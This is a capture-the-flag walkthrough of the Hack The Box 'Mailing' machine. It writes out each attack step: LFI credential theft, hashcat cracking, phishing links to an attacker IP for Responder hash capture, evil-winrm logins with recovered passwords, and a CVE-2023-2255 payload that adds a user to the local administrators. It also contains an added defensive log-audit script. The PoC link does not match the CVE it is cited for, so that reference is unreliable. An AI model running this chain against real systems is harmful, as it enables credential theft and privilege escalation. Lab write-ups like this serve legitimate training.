HTB Mailing (Easy) - Walkthrough

Hello hacker! Let’s see if we can hack this easy Windows machine named “Mailing” on the Hack The Box website and get the user and root flags.

As usual, we launch a scan with nmap to see if there are any interesting ports.

1. nmap result

25/tcp open smtp hMailServer smtpd
80/tcp open http Microsoft IIS httpd 10.0
110/tcp open pop3 hMailServer pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
587/tcp open smtp hMailServer smtpd
993/tcp open ssl/imap hMailServer imapd

After the scan is done, we can see that port 80 is open.

2. LFI

Visiting http://mailing.htb and enumerating the site leads us to an LFI vulnerability in the “Download Instructions” button.

To exploit this LFI, we do a quick Google search for “hmailserver config file location” and read that file through the LFI:

########################################
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
##########################################

That’s great! I think we have very useful information here: AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7

Let’s try to crack this password hash using hashcat (mode 0 is raw MD5):

hashcat '841bb5acfa6779ae432fd7a4e6600ba7' -m 0 /usr/share/wordlists/rockyou.txt

Cracked password: homenetworkingadministrator

3. Sending Email and Responder

After a lot of tries to exploit this machine, I also wanted to try the LLMNR attack. As we know, this machine’s name is “Mailing”, so we are going to simulate the administrator sending an email to maya at her address maya@mailing.htb; maya will click a link, which triggers the LLMNR attack. Follow these steps:

  1. Connect to hMailServer using Thunderbird and the credentials “user: administrator@mailing.htb, password: homenetworkingadministrator”.
  2. Launch the responder command:
responder -I YOUR_INTERFACE
  3. Send the links below to maya and wait for Responder:

smb://YOUR_IP
file://YOUR_IP
http://YOUR_IP
//YOUR_IP

After some minutes you should see the hash in the Responder output.

That’s great! Crack it with hashcat (mode 5600 is NetNTLMv2):

hashcat mayahash  /usr/share/wordlists/rockyou.txt -m 5600

Now let’s move on and see if we can get our user flag.

We connect using evil-winrm:

evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri

We connect successfully and find the flag in C:\Users\maya\Desktop.

4. Exploitation and PrivEsc

First things first: we attempt to upload winPEAS, but the antivirus deletes it.

Enumerating the hMailServer directory, we find a Logs folder inside and search it for “AUTH PLAIN”, because hMailServer uses AUTH PLAIN to authenticate.

get-content *.log | select-string -Pattern "AUTH PLAIN"

We find two Base64-encoded strings:

echo "AGFkbWluaXN0cmF0b3JAbWFpbGluZy5odGIAaG9tZW5ldHdvcmtpbmdhZG1pbmlzdHJhdG9y" | base64 --decode

Decoded : administrator@mailing.htbhomenetworkingadministrator



echo "AHJ1eUBtYWlsaW5nLmh0YgBEbjZ6RjNjNXM3UjlMMW8y" | base64 --decode

Decoded : ruy@mailing.htbDn6zF3c5s7R9L1o2
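
The AUTH PLAIN tokens above are only encoded, not hashed: SASL PLAIN (RFC 4616) is base64 over authzid NUL authcid NUL password, so any log that records them stores recoverable credentials. The following is an added example, not part of the original walkthrough, that a mail administrator could run to find which accounts are exposed in such logs and to redact the tokens. The log line layout in SAMPLE_LOG is constructed and assumed, and the function names are hypothetical.

```python
import base64
import binascii
import re

# Inline SASL PLAIN response as it appears after "AUTH PLAIN" in a mail log.
AUTH_PLAIN = re.compile(r"AUTH PLAIN ([A-Za-z0-9+/]+={0,2})")

def parse_sasl_plain(token):
    """Decode base64 and split authzid NUL authcid NUL passwd (RFC 4616)."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    parts = raw.split(b"\x00")
    if len(parts) != 3 or not parts[1] or not parts[2]:
        return None  # not a well-formed PLAIN message
    return tuple(p.decode("utf-8", "replace") for p in parts)

def audit_log(lines):
    """Report which accounts have a recoverable password in the log.
    The password itself is never returned, only its length."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = AUTH_PLAIN.search(line)
        parsed = parse_sasl_plain(match.group(1)) if match else None
        if parsed:
            _authzid, account, passwd = parsed
            findings.append({"line": lineno, "account": account,
                             "password_length": len(passwd)})
    return findings

def redact(line):
    """Scrub the credential blob before a log is archived or shared."""
    return AUTH_PLAIN.sub("AUTH PLAIN [REDACTED]", line)

# Constructed log lines (layout is an assumption); the token in line 2 is the
# first one decoded in this walkthrough.
SAMPLE_LOG = [
    '"SMTPD"\t1\t"10.0.0.5"\t"RECEIVED: EHLO client.example"',
    '"SMTPD"\t1\t"10.0.0.5"\t"RECEIVED: AUTH PLAIN '
    'AGFkbWluaXN0cmF0b3JAbWFpbGluZy5odGIAaG9tZW5ldHdvcmtpbmdhZG1pbmlzdHJhdG9y"',
    '"SMTPD"\t2\t"10.0.0.6"\t"RECEIVED: AUTH PLAIN bm90LWNyZWRz"',
]

if __name__ == "__main__":
    for finding in audit_log(SAMPLE_LOG):
        print(finding)
    print(redact(SAMPLE_LOG[1]))
```

Every account this reports should have its password rotated, and the logging level that records the AUTH exchange should be reviewed.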

We continue enumerating until we find LibreOffice v7.4 in C:/Program Files. We exploit it using CVE-2023-2255.py; check this very detailed PoC about this CVE:

https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

Checking the net localgroup command:

net localgroup

There’s a group called “Administradores”. We should add maya to this group for PrivEsc:

python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

We upload the generated file “exploit.odt” to C:/Important Documents and wait a moment before reconnecting with the evil-winrm command to get the root flag!

Finally, we completed this easy Windows machine. If something is not clear or if you have any suggestions, please contact me here.